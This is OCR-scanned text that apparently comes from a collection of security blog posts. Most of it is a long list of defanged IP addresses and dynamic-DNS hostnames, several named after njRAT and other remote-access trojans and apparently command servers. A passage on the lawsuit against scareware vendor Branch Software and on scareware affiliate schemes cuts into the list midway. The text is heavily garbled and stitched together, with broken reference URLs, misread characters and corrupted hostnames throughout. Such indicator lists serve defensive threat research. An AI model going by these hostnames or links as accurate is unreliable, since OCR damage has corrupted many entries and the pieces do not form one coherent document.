5. http: //ddanchev blogspot . com/2007/09/localizing-open-source-malware . html 

6. http://adanchev. blogspot. con/2007/12/russias~fsb-ve- cybercrime. html 

7. tes: /adeccasy legspe coa/ 2006 /te) puma vaiaerabis cs ceseeely cil 

8. ; = 


ttp://ddanchev.blogspot.com/2008/07/coding- spyware-and-malware-for-hire.html 
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hxxp://35[.]176[.]10[.]40/ 
hxxp://37[.]104[.]186[.]158/ 
hxxp://37[.]115[.]47[.]107/ 
hxxp://41[.]101[.]5[.]34/ 
hxxp://41[.]102[.]235[.]191/ 
hxxp://41[.]58[.]69[.]217/ 
hxxp://41[.]58[.]96[.158/ 
hxxp://43[.]254[.]134[.]157/ 
hxxp://45[.]76[.]87[.]6/ 
hxxp://46[.]164[.]167[.]42/ 
hxxp://46[.]246[.]5[.]130/ 
hxxp://46[.]246[.]85[.]131/ 
hxxp://5[.]101[.]170[.]159/ 
hxxp://5[.]187[.]49[.]231/ 
hxxp://5[.]188[.]231[.]235/ 
hxxp://5[.]34[.]183[.]64/ 
hxxp://52[.]138[.]216[.]83/ 
hxxp://52[.]87[.]114[.]116/ 


hxxp://56d8al1a6[. ]Jhopto[.]org/ 


hxxp://60[.]10[.JO[.]13/ 

hxxp://62[.]235[.]139[.]42/ 
hxxp://63[.]237[.]57[.]222/ 
hxxp://65[.]184[.]25[.]147/ 


hxxp://66fmicro[.]duckdns[.]org/ 


hxxp://68[.]53[.]163[.]100/ 


hxxp://6alexander9[.]ddns[.]net/ 


hxxp://76[.]73[.]114[.]50/ 
hxxp://77[.]139[.]164[.]191/ 
hxxp://77[.]48[.]28[.]227/ 
hxxp://78[.]12[.]174[.]157/ 
hxxp://78[.]12[.]177[.132/ 
hxxp://78[.]130[.]176[.]162/ 
hxxp://79[.]134[.]225[.]116/ 
hxxp://81[.]231[.]10[.]43/ 
hxxp://81[.]61[.179[.]44/ 
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hxxp://84[.]151[.]157[.]38/ 
hxxp://85[.]110[.]45[.]5/ 
hxxp://87[.]11[.197[.]192/ 
hxxp://89[.]134[.]165[.]187/ 
hxxp://90[.]96[.]103[.]203/ 
hxxp://92[.]122[.]53[.]40/ 
hxxp://92[.]222[.]112[.]70/ 
hxxp://94[.]183[.]210[.]219/ 
hxxp://94[.]237[.]28[.]110/ 
hxxp://95[.]100[.]252[.]51/ 
hxxp://95[.]154[.]199[.]21/ 
hxxp://a5la8y1201[.]ddns[.]net/ 
hxxp://aa123[.]zapto[.]org/ 
hxxp://aaaa5[.]hopto[.]org/ 
hxxp://abdodz[.]ddns[.]net/ 
hxxp://abdou1234[.]hopto[.]org/ 
hxxp://abdulla244[.]myftp[.]biz/ 
hxxp://abidas2018[.]ddns[.]net/ 
hxxp://abo6na[.]no-ip[.]org/ 
hxxp://abrilparadon[.]duckdns[.]org/ 
hxxp://adidas2018[.]ddns[.]net/ 
hxxp://aditrix[.]ddns[.]net/ 
hxxp://adminirg[.]no-ip[.]biz/ 
hxxp://adsfca[.]duckdns[.]org/ 
hxxp://agbero[.]duckdns[.]org/ 
hxxp://ahlanc500[.]zapto[.]org/ 
hxxp://ahmad025[.]ddns[. ]net/ 
hxxp://ahmed461[.]ddns[. ]net/ 
hxxp://ahmedhero2020[.]zapto[.]org/ 
hxxp://ahmedmhmed4711[.]ddns[.]net/ 
hxxp://ahmedstar123[.]ddns[.]net/ 
hxxp://ahmetabis[.]duckdns[.]org/ 
hxxp://akramhbcl[.]ddns[.]net/ 
hxxp://alaa170[.]hopto[.]org/ 
hxxp://aldiwani[. ]no-ip[. ]biz/ 
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hxxp://alemanial[.]duckdns[. ]org/ 
hxxp://alger07[.]ddns[.]net/ 
hxxp://alil1[.]sytes[.]net/ 
hxxp://alil23[.]ddns[.]net/ 
hxxp://alicemedrado[.]no-ip[.Jorg/ 
hxxp://alihacker2018[.]no-ip[.]biz/ 
hxxp://alihazm2017[.]no-ip[.]biz/ 
hxxp://aliking123[.]ddns[.]net/ 
hxxp://alisami[.]hopto[.Jorg/ 
hxxp://alkal[.]publicvm[.]com/ 
hxxp://almlk[.]ddns[.]net/ 
hxxp://alone[.]sytes[.]net/ 
hxxp://alsha2e[.]zapto[.]Jorg/ 
hxxp://am22am[.]ddns[.]net/ 
hxxp://amanal[.]duckdns[.]org/ 
hxxp://ambush[.]ddns[.]net/ 
hxxp://amerkad19[.]ddns[.]net/ 
hxxp://aminesaflo[.]hopto[.]Jorg/ 
hxxp://amjad[.]no-ip[.Jorg/ 
hxxp://ammal[.]myftp[. ]biz/ 
hxxp://ammar906klashnkof[.]myq-see|[.]com/ 
hxxp://anahowa[.]duckdns[.]org/ 
hxxp://anamzh[.]ddns[.]net/ 
hxxp://android68[.]ddns[.]net/ 
hxxp://andynox2018[.]myddns[.]me/ 
hxxp://annonymous1921[.]ddns[.]net/ 
hxxp://anonyklax[.]duckdns[.]org/ 
hxxp://anonymato[.]duckdns[. Jorg/ 
hxxp://anonymous1999[.]hopto[.]Jorg/ 
hxxp://anonymoushora032[.]ddns[.]net/ 
hxxp://aoa[.]myq-see[.]com/ 
hxxp://apatednsnet[.]duckdns[.]org/ 
hxxp://arabyouman|[.]sytes[.]net/ 
hxxp://arielpica[.]ddns[.]net/ 
hxxp://asd10[.]ddns[.]net/ 
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hxxp://asdaasda[.]ddns[.]net/ 
hxxp://assurancework[.]ddns[.]net/ 
hxxp://avast666[.]duckdns[.]org/ 
hxxp://azeezdeaf1122[.]ddns[.]net/ 
hxxp://azeezdeaf1996[. ]hopto[.]org/ 
hxxp://azzaenstp[.]no-ip[.]biz/ 
hxxp://b3d3h3ckd[.]ddns[.]net/ 
hxxp://bachir12345[.]hopto[.]org/ 
hxxp://badnulls[.]hopto[.Jorg/ 
hxxp://barakat[.]servegame[.]com/ 
hxxp://basyouni4[.]ddns[. ]net/ 
hxxp://bbus19[.]ddns[.]net/ 
hxxp://becharakam[.]ddns[.]net/ 
hxxp://bedwipro987[.]ddns[. ]net/ 
hxxp://bellevie[.]duckdns[.]org/ 
hxxp://benjamin1996[.]ddns[.]net/ 
hxxp://benjamin1996121[.]ddns[.]net/ 
hxxp://betterlifecommerce[.]ddns[.]net/ 
hxxp://bibich[. ]myftp[. ]biz/ 
hxxp://bkjy1122334455[.]ddns[.]net/ 
hxxp://blakbass[. ]linkpc[.]net/ 
hxxp://b0b2030[.]ddns[.]net/ 
hxxp://bobyhack[.]duckdns[.]org/ 
hxxp://brothersjoy[.]nl/ 
hxxp://bugO00[.]hopto[.]org/ 
hxxp://by-sabotage123[.]duckdns[.]Jorg/ 
hxxp://by900[. ]zapto[. ]Jorg/ 
hxxp://c[.]top4top[.]net/ 
hxxp://cabbac[.]ddns[. ]net/ 
hxxp://caoil11[.]ddns[.]net/ 
hxxp://carding[.]hopto[.]org/ 
hxxp://carrochevere[.]no-ip[.]biz/ 
hxxp://casinonono[.]ddns[.]net/ 
hxxp://cerbere9889[.]ddns[.]net/ 
hxxp://cg[.]Jddns[.]net/ 
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hxxp://chazun[.]ddns[.]net/ 
hxxp://cheatkogama[.]ddns[.]net/ 
hxxp://chinzo[.]myftp[.]biz/ 
hxxp://chrom[.]webhopl. Jinfo/ 
hxxp://chrome1[.]hopto[.]Jorg/ 
hxxp://chrome2018[. ]zapto[.]org/ 
hxxp://civita2[.]no-ip[.]biz/ 
hxxp://claxysme[.]ddns[.]net/ 
hxxp://clay157[.]no-ip[.Jorg/ 
hxxp://clivoucanada[. ]no-ip[.]Jorg/ 
hxxp://clmodding[.]ddns[. ]net/ 
hxxp://cobaiadanet[.]duckdns[.]org/ 
hxxp://connectionsdfghhh[.]myftp[.]biz/ 
hxxp://connectionsxxx[.]ddns[.]net/ 
hxxp://cownzhackr[.]ddns[.]net/ 
hxxp://crazy-evil[.]no-ip[.]biz/ 
hxxp://creazionisa[.]com/ 
hxxp://cule[.]ddns[.]net/ 
hxxp://dabii[.]ddns[.]net/ 
hxxp://daisy101[.]ddns[.]net/ 
hxxp://darkfag1337[.]hopto[.]Jorg/ 
hxxp://darkmonster255[.]ddns[.]net/ 
hxxp://darkvador[.]duckdns[. ]org/ 
hxxp://dataday[.]no-ip[.]org/ 
hxxp://dd00ddee[.]ddns[.]net/ 
hxxp://ddlink2[.]ddns[.]net/ 
hxxp://ddns[.]catamosky[. ]biz/ 
hxxp://ddnsrat[.]ddns[.]net/ 
hxxp://deity[.]ddns[.]net/ 
hxxp://delightc[.]myftp[.]biz/ 
hxxp://devsex[.]ddns[.]net/ 
hxxp://dhayan[.]ddns[.]net/ 
hxxp://dinamarca[.]duckdns[. ]org/ 
hxxp://dixenweb[.]ddns[.]net/ 
hxxp://dl[.]Jdropbox[.]com/ 
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hxxp://doc[.]Jinternetdocss[.]com/ 
hxxp://doctordido[.]no-ip[.]Jorg/ 
hxxp://dontexe[.]duckdns[.]org/ 
hxxp://dooooox[.]ddns[.]net/ 
hxxp://doublekits[.]duckdns[.]org/ 
hxxp://dr-prohak[.]myddns[.]me/ 
hxxp://duckdns[.]org/ 
hxxp://duconunun[. ]ddns[. ]net/ 
hxxp://dzad[.]ddns[. ]net/ 
hxxp://ecksdil[.]ddns[.]net/ 
hxxp://ejiroprecious[.]ddns[.]net/ 
hxxp://elmagic2[.]ddns[.]net/ 
hxxp://emad1300[.]ddns[.]net/ 
hxxp://emad1987[.]myq-see[.]com/ 
hxxp://emilylattaa4111[.]serveftp[.]com/ 
hxxp://empezarll[.]mywirel.Jorg/ 
hxxp://ena[.]sytes[. ]net/ 
hxxp://enero[.]duckdns[.]org/ 
hxxp://enghackernoip[.]ddns[.]net/ 
hxxp://essam554[.]hopto[.]org/ 
hxxp://essssssam[.]ddns[.]net/ 
hxxp://ethicalhacking[.]myftp[.]biz/ 
hxxp://evilgseguiyerrt[.]ddns[.]net/ 
hxxp://eyocbp[.]duckdns[. ]Jorg/ 
hxxp://ezelogs[.]ddns[.]net/ 
hxxp://fadiana1995[.]ddns[.]net/ 
hxxp://fanddes[.]ddns[.]net/ 
hxxp://foscam[.]myftp[. ]biz/ 
hxxp://fd8a8df5[.]ddns[.]net/ 
hxxp://felestine[. ]hopto[.]lorg/ 
hxxp://fidrali[.]no-ip[.]biz/ 
hxxp://fileserv004[.]ddns[.]net/ 
hxxp://fitnesswebsite[.]duckdns[.]org/ 
hxxp://fo2shal1[.]myq-see[.]com/ 
hxxp://focariongorda[.]duckdns[.]org/ 
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hxxp://fortoriko[.]ddns[.]net/ 
hxxp://freelancertupidor[.]myftp[.]Jorg/ 
hxxp://freetools[.]hldnsf[. ]ru/ 
hxxp://frsyescd[.]ddns[.]net/ 
hxxp://fsoc[.]ddns[.]net/ 
hxxp://fudman[.]duckdns[.]lorg/ 
hxxp://fw2[.]sshreach[.]me/ 
hxxp://gamezerer[.]ddns[.]net/ 
hxxp://gangshitxd[. ]bounceme[.]net/ 
hxxp://ggwp123[.]ddns[.]net/ 
hxxp://ghanaandco[.]sytes[.]net/ 
hxxp://giannigianni[.]ddns[.]net/ 
hxxp://giustini[.]ddns[.]net/ 
hxxp://glendyling[.]ddns[.]net/ 
hxxp://gobali[.]hopto[.Jorg/ 
hxxp://gogotest-46542[.]portmap[.]io/ 
hxxp://goodattack[.]ddns[. ]net/ 
hxxp://googlechromehost[.]ddns[.]net/ 
hxxp://googlehotspotxxxx[.]no-ip[.]biz/ 
hxxp://gorel1004[.]ze[.Jam/ 
hxxp://gr44[.]ddns[.]net/ 
hxxp://grrrfggfgfg[.]ddns[.]net/ 
hxxp://gujulio[. ]duckdns[.]Jorg/ 
hxxp://gustavomaxwell[.]ddns[.]net/ 
hxxp://gvgvgvl[.]ddns[.]net/ 
hxxp://nack2rio[.]hopto[.]org/ 
hxxp://hacker-soft[.]ddns[.]net/ 
hxxp://hackingloading157[.]ddns[.]net/ 
hxxp://hackrooo[.]ddns[.]net/ 
hxxp://hnahwa0404[.]ddns[. ]net/ 
hxxp://haider2002[.]ddns[.]net/ 
hxxp://haider2121[.]hopto[.lorg/ 
hxxp://hakanonymos4[.]ddns[.]net/ 
hxxp://hakerbatna[.]ddns[.]net/ 
hxxp://nakerz123[.]ddns[.]net/ 
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hxxp://nakoukh40[.]ddns[.]net/ 
hxxp://hakrbatna[.]hopto[.]org/ 
hxxp://nhakrdz111[.]serveftp[.]com/ 
hxxp://haniameer[.]hopto[.]Jorg/ 
hxxp://naram222[.]ddns[.]net/ 
hxxp://nassan360[.]ddns[.]net/ 
hxxp://haxorspamer[.]hopto[.]org/ 
hxxp://hellohello[.]ddns[.]net/ 
hxxp://hexycz[.]ddns[.]net/ 
hxxp://heyklog[.]duckdns[.]org/ 
hxxp://AhLihh11[.]ddns[.]net/ 
hxxp://hhhh1122[.]no-ip[.]biz/ 
hxxp://hicham9risa[.]duckdns[.]org/ 
hxxp://hinou[.]ddns[.]net/ 
hxxp://noang2667[.]zapto[.]Jorg/ 
hxxp://horizontg[.]ddns[.]net/ 
hxxp://nost355[.]casacam[.]net/ 
hxxp://nost775544[.]ddns[.]net/ 
hxxp://housam[. ]linkpc[.]net/ 
hxxp://htirnjrat[.]Jddns[.]net/ 
hxxp://Nxxp/ 
hxxp://hycotanas[.]ddns[.]net/ 
hxxp://hykedscams[.]ddns[.]net/ 
hxxp://hyoof10[.]ddns[.]net/ 
hxxp://iamn1[.]ddns[.]net/ 
hxxp://ichbinw1337[.]ddns[.]net/ 
hxxp://id700mz[.]ddns[.]net/ 
hxxp://idontratpeople[.]ddns[.]net/ 
hxxp://igi789[.]ddns[.]net/ 
hxxp://ineuche009[. ]hopto[.]org/ 
hxxp://infectiousvision1[.]ddns[.]net/ 
hxxp://inohackyouxd[.]hopto[.]Jorg/ 
hxxp://ionutsef2[.]ddns[.]net/ 
hxxp://ippoofer[.]ddns[.]net/ 
hxxp://iraql12[.]ddns[.]net/ 
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hxxp://iska123[.]ddns[.]net/ 
hxxp://issal9900[.]ddns[.]net/ 
hxxp://izan[.]hopto[.]lorg/ 
hxxp://jOe3gipuv[.]hopto[.Jorg/ 
hxxp://jOs3d4rk[.]ddns[. ]net/ 
hxxp://jlus3tan5stu8pid[.]ddns[.]net/ 
hxxp://jaaav[.]ddns[.]net/ 
hxxp://jakzaz555[.]ddns[.]net/ 
hxxp://jal[.]ze[.Jam/ 
hxxp://japontarzi[.]Jduckdns[.]org/ 
hxxp://jaxboss[.]publicvm[.]com/ 
hxxp://jerry331990[.]jerrydns[.]pw/ 
hxxp://joker1[. ]linkpc[.]net/ 
hxxp://jpaul[.]duckdns[.]org/ 
hxxp://junpio70[.]hopto[.Jorg/ 
hxxp://jutt9244[.]myftp[.]biz/ 
hxxp://k10e[.]ddns[.]net/ 
hxxp://kaboos99hacker[.]linkpc[.]net/ 
hxxp://kaka200222[.]ddns[.]net/ 
hxxp://kamalyousry1213[.]ddns[.]net/ 
hxxp://kaneki1997[.]ddns[.]net/ 
hxxp://karambaker[.]zapato[.]org/ 
hxxp://karamgamal878[.]ddns[.]net/ 
hxxp://karwan[.]ddns[. ]net/ 
hxxp://kawaja[.]hopto[.]org/ 
hxxp://keypay033[.]dynu[.]net/ 
hxxp://khan2012[.]no-ip[.]biz/ 
hxxp://killcon[.]sytes[.]net/ 
hxxp://killuakiller[.]ddns[.]net/ 
hxxp://kingdomro[.]viewdns[. ]net/ 
hxxp://kinglord22[.]ddns[.]net/ 
hxxp://kitinho[.]ddns[. ]net/ 
hxxp://klabster82nulll[.]ddns[.]net/ 
hxxp://kofia1230[.]ddns[.]net/ 
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hxxp://kok22[.]ddns[.]net/ 
hxxp://koko12[.]myftp[.]biz/ 
hxxp://kolabola[. ]linkpc[.]net/ 
hxxp://kor1[.]zapto[.Jorg/ 
hxxp://koutafa[.]ddns[.]net/ 
hxxp://ksa3651[.]ddns[. ]net/ 
hxxp://ksk7[.]gotdns[.]ch/ 
hxxp://ksks[.]gotdns[.]ch/ 
hxxp://lasourcetest[.]ddns[.]net/ 
hxxp://layane[.]ddns[.]net/ 
hxxp://Idouab[.]ddns[.]net/ 
hxxp://leehenry1973[.]ddns[. ]net/ 
hxxp://lezharlezhar[.]no-ip[.]info/ 
hxxp://libraries[.]ddns[.]net/ 
hxxp://lig1[.]serveblog[.]net/ 
hxxp://likenetstatlol[.]ddns[.]net/ 
hxxp://lillliiil[. ]Jddns[.]net/ 
hxxp://lilop[.]ddns[.]net/ 
hxxp://logarsogar[.]hopto[.]org/ 
hxxp://loginsecure[.]mywire[.]lorg/ 
hxxp://lolo[.]no-ip[.]info/ 
hxxp://lotsh[.]ddns[.]net/ 
hxxp://loveayada[.]zapto[.]org/ 
hxxp://lovejoks[.]no-ip[.]biz/ 
hxxp://m4grinexploit[.]ddns[.]net/ 
hxxp://maharek123456[.]ddns[.]net/ 
hxxp://mahonel11[.]ddns[.]net/ 
hxxp://mainjhin[.]duckdns[. ]Jorg/ 
hxxp://mal3on[.]ddns[.]net/ 
hxxp://malak9797[.]ddns[.]net/ 
hxxp://malakigoy[.]ddns[.]net/ 
hxxp://mamoon|[.]ddns[.]net/ 
hxxp://manou[. ]hopto[. Jorg/ 
hxxp://maravilhahoteis[.]ddns[.]net/ 
hxxp://maroxvil[.]ddns[.]net/ 
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In case you haven't heard - [1]Microsoft and the Washington state are suing a U.S based - 
naturally - "scareware" vendor Branch Software : 


"We won’t tolerate the use of alarmist warnings or deceptive ‘free scans’ to trick con- 
sumers into buying software to fix a problem that doesn’t even exist," Washington Attorney 
General Rob McKenna said. "We’ve repeatedly proven that Internet companies that 
prey on consumers’ anxieties are within our reach." 


Sadly, Branch Software is the tip of the iceberg on the top of the affiliates participating 
in different affiliation based programs, which similar to [2]IBSOFTWARE CYPRUS and [3]Inter- 
activebrands, which I’ve been tracking down for a while, are the aggregators of scareware that 
popped up on the radars due to their extensive portfolios. These three companies offering 
software bundles or plain simple fake software, are somewhere in between the food chain 
of this ecosystem, with the real vendors paying out the commissions on a per installation 
basis slowly starting to issue invitation codes that they’ve distributed only across invite-only 
forums/sections of particular forums. 


Behind these brands is everyone that is participating in the franchise and is putting per- 
sonal efforts into monetizing the high payout rates that the fake security software vendor 
is paying for successful installation. These high payout rates - with the financing naturally 
coming straight from other criminal activities online - are in fact so high, that | can easily say 
that the last two quarters we’ve witnesses the largest increase of such domains ever, and 
they’re only heating up since the typosquatting possibilities are countless and they seem to 
know that as well. 


It’s important to point out that their business model of acquiring traffic is outsourced to 
all the affiliates that do the blackhat SEO, SQL injections, web sessions hijacking of malware 
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hxxp://maxime10[.]ddns[.]net/ 
hxxp://maxpayne9Y[.]ddns[.]net/ 
hxxp://mdformol[.]ddns[. ]net/ 
hxxp://medomshakel[.]ddns[. ]net/ 
hxxp://mneemo1233m[.]ddns[.]net/ 
hxxp://mekawy[.]hopto[.]org/ 
hxxp://mercymorrgan[.]wm01[.]to/ 
hxxp://meso[.]myftp[.]biz/ 
hxxp://mgnoongmz[.]ddns[.]net/ 
hxxp://mhmod[.]ddns[.]net/ 
hxxp://micrOsOft[. ]duckdns[.]lorg/ 
hxxp://microsoft-ipv6[.]duckdns[.]org/ 
hxxp://microsoft171[.]duckdns[.]org/ 
hxxp://microsoft24515062[.]serveftp[.]com/ 
hxxp://microsoftddns[.]ddns[.]net/ 
hxxp://microsoftserver[.]serveftp[.]com/ 
hxxp://microsoftsession[. ]linkpc[.]net/ 
hxxp://microsoftupdates[.]pw/ 
hxxp://midoalhashmi[.]ddns[.]net/ 
hxxp://midoumed[.]ddns[.]net/ 
hxxp://mikas[.]ddns[. ]net/ 
hxxp://minergate[.]sytes[.]net/ 
hxxp://mixterix[.]duckdns[.]org/ 
hxxp://mjlosker[.]hopto[.]org/ 
hxxp://mogofockerdu94[.]chickenkiller[.]com/ 
hxxp://mohamed1234[.]no-ip[.]biz/ 
hxxp://mohamedahmed123[.]ddns[.]net/ 
hxxp://mohammad2010[.]no-ip[.]biz/ 
hxxp://mohand8s080[. ]ddns[. ]net/ 
hxxp://mongtrelgo[.]hopto[.]org/ 
hxxp://moonwork93[.]hopto[.]org/ 
hxxp://moskando[.]ddns[.]net/ 
hxxp://mouqgsud[.]duckdns[. ]Jorg/ 
hxxp://mrfmr123[.]ddns[.]net/ 
hxxp://mtateste[.]duckdns[.]org/ 
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hxxp://mujo[.]ddns[.]net/ 
hxxp://mum14[.]hopto[.Jorg/ 
hxxp://myhostoftuptup[.]servebeer[.]com/ 
hxxp://mylifegod[.]ddns[.]net/ 
hxxp://myloves[.]publicvm[.]com/ 
hxxp://mynamechucknorris[.]ddns[.]net/ 
hxxp://myno[. ]hopto[.]org/ 
hxxp://na20022a[.]ddns[.]net/ 
hxxp://naralam[.]ddns[.]net/ 
hxxp://nass12[.]ddns[.]net/ 
hxxp://nestonesto[.]duckdns[.]org/ 
hxxp://nettcpportsharing[.]serveftp[.]com/ 
hxxp://newanonjoe[.]ddns[.]net/ 
hxxp://nfadil[. ]Imyq-see[.]com/ 
hxxp://ngrok[.]xiaotk[. ]tk/ 
hxxp://night[.]dynu[.]net/ 
hxxp://nippon[.]hopto[.]Jorg/ 
hxxp://nixonhabbo[.]duckdns[.]org/ 
hxxp://njgypto[. Jlinkpc[.]net/ 
hxxp://njhost[. ]hopto[.]org/ 
hxxp://njratO5[.]ddns[.]net/ 
hxxp://njratftw123[.]hoptol[.]Jorg/ 
hxxp://nkgclaudineil.]Jddns[.]net/ 
hxxp://nkgclaudineil.]duckdns[.]org/ 
hxxp://nkilishinkili[. ]hopto[.Jorg/ 
hxxp://nmr-syria[.]ddns[.]net/ 
hxxp://nonnikcmg[.]duckdns[.]org/ 
hxxp://notelog11[.]ddns[.]net/ 
hxxp://notimposible[.]hopto[.]org/ 
hxxp://nu[. ]mmafan[. ]biz/ 
hxxp://nuevochancel[.]duckdns[.]Jorg/ 
hxxp://nuttentool[.]Jddns[.]net/ 
hxxp://nyjoral[.]myq-see[.]com/ 
hxxp://olfil.]zapto[.Jorg/ 
hxxp://omotogbo[.]ddns[.]net/ 
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hxxp://onixoino[.]ddns[.]net/ 
hxxp://openthetchekal[. ]ddns[.]net/ 
hxxp://opitalia[.]ddns[.]net/ 
hxxp://optimus1[.]ddns[.]net/ 
hxxp://oriod445se[. ]hopto[.]org/ 
hxxp://oryano[.]ddns[.]net/ 
hxxp://osiman|[. ]cf/ 
hxxp://osmanlimparatorlugu[.]duckdns[. ]org/ 
hxxp://othmane5[.]ddns[.]net/ 
hxxp://ozill619[.]ddns[.]net/ 
hxxp://ozone[.]myftp[.]org/ 
hxxp://pablitoescobar[.]duckdns[.]org/ 
hxxp://paladinsO05[.]ddns[.]net/ 
hxxp://palestine2014[.]zapto[.Jorg/ 
hxxp://paoduentil.]Jduckdns[.]org/ 
hxxp://patakos0010[.]ddns[.]net/ 
hxxp://pazparatodos[.]duckdns[.]org/ 
hxxp://pcctks[.]ddns[.]net/ 
hxxp://pikhateamspeak[.]duckdns[.]org/ 
hxxp://pistola404[.]duckdns[. ]org/ 
hxxp://plo[.]ddns[.]info/ 
hxxp://pm2bitcoin[.]com/ 
hxxp://poderxtremo[.]duckdns[.]Jorg/ 
hxxp://port5[.]ddns[.]net/ 
hxxp://portnj[.]ddns[.]net/ 
hxxp://ppooiimmnnbbOO[.]ddns[.]net/ 
hxxp://predatorshot[.]ddns[.]net/ 
hxxp://prime2018[.]duckdns[.]org/ 
hxxp://probityjrat5[.]duckdns[.]Jorg/ 
hxxp://proemepror[.]ze[.]am/ 
hxxp://proemperor[.]ze[.]am/ 
hxxp://projecttestingforedu[.]chickenkiller[.]com/ 
hxxp://prorms[.]ddns[.]net/ 
hxxp://provafood[.]ddns[.]net/ 
hxxp://prrrorrrfrrr[. Jmyftpl[.]biz/ 
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hxxp://pwnedbydefalt[. ]ddns[. ]net/ 
hxxp://q3alkhater123[.]ddns[.]net/ 
hxxp://qqwweerr[. ]ddns[. ]net/ 
hxxp://queimaaivagaba[.]ddns[.]net/ 
hxxp://quickmessage[.]io/ 
hxxp://qwert[.]ddns[. ]net/ 
hxxp://qwertardormad1223[.]ddns[.]net/ 
hxxp://qwetyul[.]hopto[.]org/ 
hxxp://rachid061574[.]hopto[.]org/ 
hxxp://racikelo[.]ddns[.]net/ 
hxxp://rainbow6[.]ddns[.]net/ 
hxxp://ramadan[.]mywire[.]org/ 
hxxp://ramzimbacscay[.]hopto[.]org/ 
hxxp://raramimil23[.]ddns[.]net/ 
hxxp://rat24695[.]ddns[.]net/ 
hxxp://rattatata[.]ddns[.]net/ 
hxxp://rattinguy[.]ddns[.]net/ 
hxxp://realhacking2018[.]3utilities[.]com/ 
hxxp://redereynol[.]ddns[. ]net/ 
hxxp://redwatchliveOO1[.]ddns[.]net/ 
hxxp://renanzinho2411[.]ddns[.]net/ 
hxxp://resser2020[.]hopto[.]org/ 
hxxp://rezallta[.]ddns[.]net/ 
hxxp://riad123[.]ddns[.]net/ 
hxxp://riazi312015[.]ddns[.]net/ 
hxxp://rida9949[.]ddns[.]net/ 
hxxp://ririrorol23[.]ddns[.]net/ 
hxxp://romania23[.]zapto[.]Jorg/ 
hxxp://romany14[.]ddns[.]net/ 
hxxp://ruleshack[.]ddns[.]net/ 
hxxp://rumpa70[.]ddns[.]net/ 
hxxp://rzkfofo[.]no-ip[.]org/ 
hxxp://sa123re[.]no-ip[.lorg/ 
hxxp://sa7er-hacker[.]ddns[.]net/ 
hxxp://sa7er-hackre[.]ddns[.]net/ 
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hxxp://sadosaykodz1[.]ddns[.]net/ 
hxxp://sadsadsad[.]ddns[.]net/ 
hxxp://saidafrentesatanas[.]ddns[.]net/ 
hxxp://saif321[.]ddns[.]net/ 
hxxp://saifer2121[.]myftp[.]biz/ 
hxxp://sakagiller[.]com/ 
hxxp://salahjra[.]ddns[. ]net/ 
hxxp://salehroot[. Jlinkpc[.]net/ 
hxxp://salmal[.]ddns[.]net/ 
hxxp://samfam[.]pdns[.]cz/ 
hxxp://samops[.]ddns[.]net/ 
hxxp://sapiklar[.]duckdns[.]org/ 
hxxp://sare[.]myq-see[.]com/ 
hxxp://sasoO[.]myftp[.]lorg/ 
hxxp://savakil[.]duckdns[.]org/ 
hxxp://sayedkastilo11[.]hopto[.]lorg/ 
hxxp://scviroos[. ]bounceme|[.]net/ 
hxxp://sdafff[.]no-ip[.]biz/ 
hxxp://secureutility[.]redirectme[.]net/ 
hxxp://securit[.]linkpc[.]net/ 
hxxp://secutit[. ]linkpc[.]net/ 
hxxp://sefrou20[.]ddns[. ]net/ 
hxxp://seifrastabia[.]no-ip[.]biz/ 
hxxp://semonsemon[. ]zapto[. ]org/ 
hxxp://serverclean[.]hopto[.]org/ 
hxxp://serveursam[.]hopto[.]org/ 
hxxp://serviceonline[.]duckdns[.]org/ 
hxxp://servicepcinfo[.]myddns[.]rocks/ 
hxxp://sexyas[.]ddns[.]net/ 
hxxp://shadowhakar41[.]ddns[.]net/ 
hxxp://shangri027[.]ddns[.]net/ 
hxxp://shemzh[.]ddns[.]net/ 
hxxp://shigra[.]sytes[.]net/ 
hxxp://shodann[.]ddns[.]net/ 


hxxp://shore[.]kozow[.]com/ 
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hxxp://shytangz1[.]ddns[.]net/ 
hxxp://sidosido-crb[. ]hopto[.]org/ 
hxxp://sikomoto[. Jonthewifi[.]com/ 
hxxp://silent-kira[.]no-ip[.]info/ 
hxxp://sjad1995[.]myftp[. ]biz/ 
hxxp://skullman[.]duckdns[.]org/ 
hxxp://slar[.]duckdns[.]org/ 
hxxp://smffuked[.]ddns[.]net/ 
hxxp://smox1111[.]ddns[.]net/ 
hxxp://smyle42[.]ddns[.]net/ 
hxxp://snipere3131[.]ddns[.]net/ 
hxxp://soso7[.]myq-see[.]com/ 
hxxp://splashnet[.]ddns[.]net/ 
hxxp://ssed[.]ddns[.]net/ 
hxxp://sskizz[.]Jddns[.]net/ 
hxxp://ssl-virustotal[.]com/ 
hxxp://ssss22[.]ddns[.]net/ 
hxxp://stanley10[.]linkpc[.]net/ 
hxxp://stub[.Jignorelist[.]com/ 
hxxp://sub2[.]qaysarpizzajo[.]xyz/ 
hxxp://suchfamily[.]eu/ 
hxxp://sucka[.]duckdns[.]org/ 
hxxp://sugesu[.]ddns[.]net/ 
hxxp://svchost101[.]ddns[.]net/ 
hxxp://svhosted[.]zapto[.]Jorg/ 
hxxp://sys11[.]ddns[.]net/ 
hxxp://systemm[.]ddns[.]net/ 
hxxp://systemx[.]hopto[.]Jorg/ 
hxxp://takethatshit[.]ddns[.]net/ 
hxxp://tala1234[.]zapto[.Jorg/ 
hxxp://target81[.]ddns[.]net/ 
hxxp://tata508[.]ddns[.]net/ 
hxxp://tomh[.]ddns[.]net/ 
hxxp://teleporthack[.]ddns[.]net/ 
hxxp://testlfg[.]ddns[.]net/ 
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hxxp://the-don187[.]publicvm[.]com/ 
hxxp://thefuturisus[.]ddns[.]net/ 
hxxp://thiagohora[. ]hopto[.]org/ 
hxxp://tomhilker024[.]ddns[.]net/ 
hxxp://top2[.Jalqaysarpizza[.]xyz/ 
hxxp://topwiko[.]ddns[.]net/ 
hxxp://tossonat[.]ddns[.]net/ 
hxxp://total-virus[.]myq-see[.]com/ 
hxxp://trabalhoaaal[.]ddns[.]net/ 
hxxp://trasatlis[.]sytes[.]net/ 
hxxp://tsdn[. ]linkpc[.]net/ 
hxxp://ttmglaz[.]ddns[.]net/ 
hxxp://ture-free[.]ddns[.]net/ 
hxxp://turlututu[.]zapto[.]Jorg/ 
hxxp://tutobaixeil.]ddns[.]net/ 
hxxp://unificaequatorial[.]ddns[.]net/ 
hxxp://unknown277[.]ddns[.]net/ 


hxxp://updatefacebook[.]serveblog[.]net/ 


hxxp://vam22[.]ddns[.]net/ 
hxxp://vantomrat1133[.]ddns[.]net/ 
hxxp://vendeto[.]hopto[.]org/ 
hxxp://vice[.]hopto[.]Jorg/ 
hxxp://videntets3[.]ddns[.]net/ 
